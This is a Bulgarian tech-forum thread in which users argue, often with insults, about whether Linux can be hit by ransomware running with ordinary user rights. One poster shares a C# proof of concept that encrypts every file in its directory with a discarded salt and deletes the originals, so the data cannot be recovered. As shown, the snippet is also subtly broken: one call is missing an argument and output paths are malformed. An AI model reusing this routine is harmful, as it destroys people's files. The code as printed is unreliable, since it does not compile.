Премини към съдържанието
  • Добре дошли!

    Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

    Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

     

Linux - обща дискусия 3


Препоръчан отговор

може ли с вас да се води нормална дискусия или само се биете в гърдеите колко сте велики?

Ти от къде знаеш аз какво знам и какво не знам. Задавам въпрос и бивам нападан. МНислете и правете каквото искате, в края на деян вие си оставате писачи въ форум с налудничеви идеи.

Та така как точно някой идва на налудничевата идея че трябват рооткси права за да озпълняваш каквото и да е?

щ това ако потребителя изпълни нещо с програмата има достъп до всичко, до което и потребителя има достъп, това означава, че ако е криптираща програма, може да криптира всички файлове на потребителя :). Аз не мога да разбера как вие не може да го проумеете!

Линк към коментара
Сподели в други сайтове

  • Отговори 7,1k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

преди 4 минути, Desdinova написа:


Я си напрегни малко главата и помисли от къде идва тази налудничева идея че ти трябват роот права за да изпълниш каквото и да било ...

Ами, дай реален пример, как ще стартираш изпълним файл, който да криптира файлове/ директории дори в потребителската директория, без да имаш администраторски права. Можеш да ми пратиш и приложението/скрипта да го тествам.

Линк към коментара
Сподели в други сайтове

Някои наземни станции на NASA ползват Linux.
Не вярвам да е случайно и цената да е само фактор а и лесната поддръжка и отбрана от гледна точка на секюрити.
 

Редактирано от Гост (преглед на промените)
Линк към коментара
Сподели в други сайтове

Ако имахте право, и не беше възможно да се разпространява зловреден код в линукс, всички щяха да го ползват, но понеже това не е така вие си говорите :) и не се случва нищо :).

Линк към коментара
Сподели в други сайтове

Току що, Tanner Foost Foust написа:

Някои наземни станции на NASA ползват Linux.
 

Международната космическа станция е под Linux.  Малко, обаче съм изпуснал нишката на дискусията и не знам, за какво сте започнали спора.

Линк към коментара
Сподели в други сайтове

Десинко маре дай некъФ пример от практиката ?Как че ми натровиш Убунтуту :)

Линк към коментара
Сподели в други сайтове

Типично по женски..........като котка е ,по гръб не пада :)

Линк към коментара
Сподели в други сайтове

Деска те хората са ти го дали без пари пък ти че не го ползваш си е твой проблем.Ползват го военните,администрацията,фирмите за битова  и производствена електроника в колите го има в корабите го има и в самолетите го има. Правят  се филми,музика  и игри с него. Има го във всички сектори от ежедневието ни. 

Редактирано от AlkatrazBG (преглед на промените)
Линк към коментара
Сподели в други сайтове

преди 17 минути, Desdinova написа:

може ли с вас да се води нормална дискусия или само се биете в гърдеите колко сте велики?

Ти от къде знаеш аз какво знам и какво не знам. Задавам въпрос и бивам нападан. МНислете и правете каквото искате, в края на деян вие си оставате писачи въ форум с налудничеви идеи.

Та така как точно някой идва на налудничевата идея че трябват рооткси права за да озпълняваш каквото и да е?

щ това ако потребителя изпълни нещо с програмата има достъп до всичко, до което и потребителя има достъп, това означава, че ако е криптираща програма, може да криптира всички файлове на потребителя :). Аз не мога да разбера как вие не може да го проумеете!

И аз това се питам може ли да водим нормална дискусия. Не те нападаме, а се опитваме да ти обясним каква е разликата и защо криптирането на файлове ала Windows е малко вероятно. За да се получи такова нещо първо покрай този криптираш код, трябва да влезе друг, който да позволи изпълнението му.  Това са изключително сложни неща и не стават само с един скрипт. Трябва да има сериозен пропуск в сигурността, който да не е закърпен. Хайде примерно ако гoворим за web  сървис по-съм съгласен, въпреки, че и там е доста сложно подобна промяна, но зависи какво се изпълнява на сървъра. Нали разбираш, че трябва да се пробият няколко защити. Като да се придобият root права. После идва SELinux ако го има, Firewаll...   

Относно руутските права както се изразяваш, просто приеми, че са необходими, когато се изпълнява изпълним файл, без тях няма как. А относно програмите, те имат ограничени права, често до правата на потребителя. Повярвай ми на този етап, трудно malware ще криптира файловете под Линукс, освен ако ти самия не му разрешиш.

Редактирано от exwol (преглед на промените)
Линк към коментара
Сподели в други сайтове

Аз ще кажа че никой цивилен не може да притежава непробиваема система, под която да е операционна система, след нея има и други сегменти като вътрешна мрежа и мрежови устройства, които са също под някаква операционна система била IOS или Unix базирана. 

Спрямо Микрософт операционните системи , тези Linux дистрибуции са по надеждни от гледна точка на сигурност.
Съществуват много повече Linux дистрибуции и не бих се заел да ги преброя, какво искам да кажа с това?
Ами трудно може да се напише универсален вирус за всички тези дистрота, тъй като те са различни, с различни ядра и кърнели.
Ако ползвате Линукс дистрибуция с доказана надеждност от гледна точка на сигурност. Ако инсталирате софтуер през официалните канали, трудно бихте били заразен с какъвто и да е вирус. Тъй като тук начините са 3. 

Или сървърът от който се свалят програмите да се зарази и да се подменят пакетите, или самата дистрибуция да е преработена и компрометирана предварително, или потребителят да изпълни програма от неизвестен източник и сам да си сложи таралежа в гащите.

Под Линукс до сега не съм срещал нещо което да се изпълнява и да се инсталира автоматично във фонов режим без да има запитване за рут парола..

До като под Mикрософт нещата са много по уязвими.
Просто Микрософт е монополът и правят страшно много пари заедно с антивирусните компаниии.
Това е бизнес.

Редактирано от Гост (преглед на промените)
Линк към коментара
Сподели в други сайтове

Вече писах на cybercop. Може да му пратя бинари ако иска или може да си го компилира от код. Ето невероятно сложната работа отнема 10 минути. Ест това не е словреден вирус, но демонстрира как мога да криптирам файловете с права на потребител. Надявам се това да е достатъчно ясно.

 

Така че още веднъж. Ако може да изпълнява чужд софтуер, всичко е възможно!

 

 

using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;

namespace ProofOfConceptKaldata
{
	class MainClass
	{
		public static void Main (string[] args)
		{
			var random = new Random ();
			var secretpassword = Encoding.UTF8.GetBytes ("86da2012-dcc0-44e7-9a36-a3b13d1e963d");
			var currentDirectory = Path.GetDirectoryName (Assembly.GetEntryAssembly ().Location);
			var filesInCurrentDir = Directory.GetFiles (currentDirectory);

			foreach (var file in filesInCurrentDir) {
				if (file.ToLower().Contains("kaldata"))
					continue;

				var fileToEncrypt = File.ReadAllBytes (file);
				var encryptedContent = AESEncrypt (fileToEncrypt, secretpassword);
				File.Delete (file);
				File.WriteAllBytes (String.Format("{0}{1}.encrypted", Path.GetDirectoryName(file), random.Next()), encryptedContent);
			}
		}
			
		static byte[] AESEncrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
		{
			using (MemoryStream ms = new MemoryStream())
			{
				using (RijndaelManaged AES = new RijndaelManaged())
				{
					AES.KeySize = 256;
					AES.BlockSize = 128;

					var key = new Rfc2898DeriveBytes(passwordBytes, GenerateSalt(), 1000);
					AES.Key = key.GetBytes(AES.KeySize / 8);
					AES.IV = key.GetBytes(AES.BlockSize / 8);

					AES.Mode = CipherMode.CBC;

					using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
					{
						cs.Write(bytesToBeEncrypted, , bytesToBeEncrypted.Length);
						cs.Close();
					}
					return ms.ToArray();
				}
			}
		}

		static byte[] GenerateSalt() {
			var random = new RNGCryptoServiceProvider();
			int max_length = 128;
			byte[] salt = new byte[max_length];
			random.GetNonZeroBytes(salt);
			return salt;
		}
	}
}

 

Линк към коментара
Сподели в други сайтове

Аз виждам нещата по следният начин: Вие сте си в вашата локва, ако някой вуншен дойде и ви каже нещо което е не типично за вашата локва, той бива нападан. Като "Алегория за Пещерата". Дадох конкретен пример, вие продължавате да си харесвате отговорите и да живеете в заблуда. Както и да е.

Явно за това България е една от водещите ИТ дестинации в света ... о момент, не това не е България :) ...

Линк към коментара
Сподели в други сайтове

преди 3 часа, Desdinova написа:

не ти не схващаш проблема понеже си много фиксиран върху системата си.

Ако искам да навредя на потребителя, не ми трябва нищо друго освен да изпълня нещо с правата на потребителя. Например ако искам да криптирам неговите файлове, не ми пука за системата :).

Я напъни някоя мозъчна клетка и помисли малко ... за да инсталираш нещо под линукс също ти трябват админски права, за да пишеш по системните директории. ... например sudo apt-get
интересно ти е??? ... есплоити и слаби места колкото искаш, всичко е възможно.

run it bitch ./not_a_virus :)

иеха ... фук апаче, идеята е какво изпълняваш със апаче :). Числото 99,99999% е доста смело изказване, как точно стигна до него? :)

Може би в Луковит нещата са различни :).

И какво за apt-get? Случайно да знаеш, че всички пакети са подписани, нещо за sha суми да си чувал? Всичко в официалните репозитории е проверено. Стига пляска без да имаш елементарна представа.

Редактирано от Mozo (преглед на промените)
Линк към коментара
Сподели в други сайтове

И отново типично по български смесва аргументи и влачи нещата в друга посока.

Изказването ти е безпочвено и ням анищо общо с аргумента, че ти трябват роот права за да инсталираш софтуера, без значение дали е дигитално подписан или не.

Редактирано от Desdinova (преглед на промените)
Линк към коментара
Сподели в други сайтове

Под Мак иска ли ти парола като си инсталираш скайпа ?  Новите версии вадят ли ти предупреждение  и прозорче за паролката като инсталираш  софтуер ? Огромни капацитети в областа на програмирането са  ги мислили тия опер. с-ми  много преди ти да се родиш даже. Не случайно е направено по този начин  и зад това стоят  доста  солидни аргументи. Това ,че на тебе не ти изнася  или на някой като тебе  не е причина да  се опитваш да  прокарваш абсолютни глупости като  теза. Десетки милиони хора ползват  линукс дистрибуции за какво ли не и никой не е хванал до сега вирус  или да си е  криптирал  случайно от файл каквото и да е, та ти като най  умния и най разбиращия  да пускаш тука някакви   елементарни редове код и да  убеждаваш  ,че е възможно. Теоритично може и да е възможно ама на практика е 99%  не възможно да се случи.  Ако беше  възможно първо щяха да  се криптират сървъри на държавни  организации   и най накрая на бай ти  Киро   Home директорията със снимките от зарезан :)   Казах ти и пак ти повтарям белким проумееш ,че  вирус нямам как да вирее в система която е с отворен код защото ще го видят милиони хора  за по малко от 1 час  и за още 1 ще бъде  фиксната дупката в сигурността.Гледай умник и спри да пишеш простотии

 

Редактирано от AlkatrazBG (преглед на промените)
Линк към коментара
Сподели в други сайтове

Хейййй старо видео от някакъв странен булгарин, който говори за някакви воодоо абстрактни глупости.

Бтв. Аз съм единствения тук който е постнал някакъв код, той че е елментарен, елементарен е, но за теб е далеко от прост, така че леко с квалификациите! Cybercop говори за скриптове ... аз скриптове не съм поствал, но явно за някой който голямата работа е да изпълнява bash които не разбира, всичко е скрипт.

И това което казваш просто не е вярно. Ти колко пъти си допринасял за проектите които ползваш. Много хорам ислят че някой друг ще види и оправи проблема, и така никой не го оправя, ако изобщо на някой му пука. След като за добра дискусионна стратегия в булгаристан смятате постването на неща от трети хора, ето ено линкче: http://www.heise.de/security/meldung/Admins-aufgepasst-Krypto-Trojaner-befaellt-hunderte-Webserver-3116470.html

сигурен съм се че може да намерите и още много такива. Системите с които се разработват като отворен код не са магически и воодо които четат мисли и не изпълняват зловреден код!

Линк към коментара
Сподели в други сайтове

Е тоя  "странен българин"  спечели 50 милиона евро  от продажбата на Телерик  и е един от най добрите програмисти в България !!  Преподва в няколко университета  на такива драскачи като тебе . Вуду-муду и дуду ги  практикувай в домашни условия.  Постнал си нещо което не работи и няма и как да проработи под линукс дистрибуция. Спирам да  водя диалог с тебе защото е абсолютно безпредметно. Ти си абсолютен лаик на тема линукс  и освен ,че натовари базата  данни на форума с безсмислени драсканици друго не направи. Не знам  вуду ли е или  е шаманство ама хората са си доверили  парите,бизнеса,бъдещето и настоящето на линукс  базирани с-ми от  десетилетие насам . Ходи сега да пишеш крипто вируси да те видя какво ще напишеш :) То това е шпек салам - режеш и ядеш :D

Редактирано от AlkatrazBG (преглед на промените)
Линк към коментара
Сподели в други сайтове

Как реши че не работи и че няма как да рбаоти, след като тук работи всеки път. Ти не ми казвай аз какъв съм

Редактирано от Desdinova (преглед на промените)
Линк към коментара
Сподели в други сайтове

Запиши се в Софтуни. Наков да те научи да програмираш.

Наков обича да води и системни администратори като лектори на обучаемите си, не ги откъсва и от света на линукс.

След като минеш курсовете на Светлин Наков и вникнеш във философията му ще се научиш да галиш егото си по друг начин.

Това C ли е C+ ли е C# ли е?

Смешно е!

Карал съм двете части на C# в софтуерната академия..

Дипломната ми защита беше софтуер с несиметрично криптиране на данни RSA. С частни и публични ключове.

Само като ти гледам кода виждам че се ползва готова криптографска библиотека. И кодът ти е копий пейст. Не виждам нищо креативно освен смешни редакции по не значителни фрагменти в кода..... И си мислиш че си направил нещо... Нищо не си направил.....

Разбери тук не си голяма работа и няма да бъдеш. Тези номерца мотат да минат пред компютърно неграмотни лица...... Не се излагай ;)

Или се специализирай в писане на вируси за линукс много е доходоносно, ако следиш мисълта и иронията ми. ;)

Те за това на Микрософт им текат лигите по линукс шото опен сорсът е шит.... Не ги плаши нали.....

Само като чета и вниквам в речника ти ми става ясно какъв човек си.... Психология... Стилът на писане и изразите, както и конструкцията на изреченията са много показателни. Един програмист или обучаем по програмиране, никога няма да тръгне да се излага по този начин по който го правиш ти. Да парадираш с чужд фрагмент код е много несериозно. 

Най вероятно си някой ученик избиващ комплекси във форума.

Програмистите са математици, антлоговорящи, потайни, особени, котато влизат в спор са категорични и имат железни аргументи. Съжалявам но не виждам в теб нищо програмистко освен парадиране с чужд код и избиване на комплекси.

Майката е свято нещо, можеш да поздравиш своята, за това че много добре те е възпитала.... ;)

Редактирано от Гост (преглед на промените)
Линк към коментара
Сподели в други сайтове

Това, че не може да има вируси за Линукс, са пълни глупости. Има ли търсене ще има и предлагане на вируси. Друг в въпроса, колко лесно може да се засегне цялата система ... ама това изобщо не е от значение. Достатъчно е да се изпълни като обикновен протребител за да направи поразията. Примерно за криптовирус е идеално. Ценните ви неща (документи, информация и т.н) ще са точно с права на потребителя Ви ... голяма работа, че иначе системата ще работи. 

Иначе криптирането е много лесно. Не виждам какъв да е проблема. Не виждам обаче, кое му е същественото в случая. Ако решиш да изпълниш произволен софтуер на своя глава ти си поемаш риска.

p.s.

@Desdinova Тези за майката ги приказвай на живо.

Линк към коментара
Сподели в други сайтове

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

Гост
Напишете отговор в тази тема...

×   Вмъкнахте текст, който съдържа форматиране.   Премахни форматирането на текста

  Разрешени са само 75 емотикони.

×   Съдържанието от линка беше вградено автоматично.   Премахни съдържанието и покажи само линк

×   Съдържанието, което сте написали преди беше възстановено..   Изтрий всичко

×   You cannot paste images directly. Upload or insert images from URL.

  • Разглеждащи това в момента   0 потребители

    • Няма регистрирани потребители разглеждащи тази страница.
  • Подобни теми

    • от Недко
      Здравейте !

      Преди години в предаването "Микрофон и мишка" на Дарик Радио чух, че компютър с Linux може да се използва като антивирусен "филтър", или изобщо средство за защита на интернет трафика на компютър с Windows.
      В моя случай дори е належащо, защото имам компютър с XP, която вече не се поддържа от MS.
      Наскоро ме "светнаха", че такива машини не само са лесни за заразяване, но и били цел за някакви ботове, създадени да сканират нета и да откриват такива компютри. 
      Та, на въпроса с филтриращия Linux компютър. Дали все още е актуално такова решение, дали има ефект, 
      има ли писано някъде в нета за него и описано как се прави ?
      Моля за някаква информация, съвет, линк на български, руски, английски, немски ...
      или дори само за правилна формулировка на въпроса към Гугъл !

      Предварително ви благодаря !

      P.S. Да уточня, че имам други лаптопи с Linux Mint 20.2, но този с ХР искам да си остане така.

      Евентуално, като вариант, инсталиране на XP във виртуална машина на Linux система,
      дали е ефективно решение за защита на ХР-то ?
       
    • от vpvelev
      Здравейте!
      Отварям отделна тема за още една Linux дистрибуция - Gentoo.
      Много са чували за нея, но малко са я ползвали. Причината е, че трудно (това е относително) се инсталира и изисква много време, защото всичко се компилира от изходен код. Последното пък изисква по-мощен хардуер, а не всеки разполага с такъв.
      При мен се случи така, че първото ми запознаване с Линукс беше имено с Gentoo Linux (нямам точен спомен, но преди 2005 година беше). Но не защото знаех нещо за линукс или за Gentoo, а защото не знаех какво ме очаква.  Но се оказа, че съм имал късмет да попадна на тази дистрибуция, за да науча поне нещо за линукс.
      И от тогава, тъй като не съм имал подходящ компютър (поне така съм си мислел) до преди няколко дена не обръщах внимание на тази дистрибуция.
      Тия дни я инсталирах и засега работи нормално всичко. Затова и отварям тази тема за новини, дискусии, помощ и др.
      Инсталацията я направих от съществуваща при мен друга линукс дистрибуция - Arco Linux. По начало Gentoo може да се инсталира и от други дистрибуции. Този начин за инсталиране, поне за мен е за предпочитане, особено за тия, които не са много запознати, а и не искат да си загубят другата дистрибуция.
      При този вид на инсталация не са необходими никакви флашки и дискове, а освен това се инсталира в графична среда и се ползват и четат различни статии и разяснения. Така инсталацията става много лесно. Дори може и да се прекрати, ако някой се уплаши или му омръзне и след време може пак да я продължи.
      Ето няколко линка за това. И аз ще покажа по-нататък как протече при мен инсталацията и какви проблеми срещнах.
      https://www.wikihow.com/Install-Gentoo-Linux-from-Ubuntu
       
      Отваряте терминала и започвате
      Използвах тия два линка в началото, но след това направих нещо средно м/у тях. Но това зависи от мощността на компютъра или какъв профил ще изберете:

      Важното е да не се отказвате лесно след първите неуспехи.

       

    • от Теодор Тодоров
      За забравената парола на BIOS-а нищо не reset-на самата парола ще инсталирам Windows 8.1 На друг диск, защото не знам как се инсталира plop boot manager под linux, Гледах клипове как се инсталира plop под linux но нищо не разбрах от него
    • от Street Life
      Здравейте!
      #####
      На дамите - Честит празник!
      #####
      Въпросът ми е:
      На какъв принцип работи Microsoft Windows? Подобен ли е като в Wayland или Xorg на Linux?
       
    • от Camazotz_21
      Искам да попитам, ако си поръчам лаптоп с Ос-Linux мога ли след това да му сложа Windows? Защото ми слага триста лева отгоре с Windows. 
×
×
  • Добави ново...

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите Условия за ползване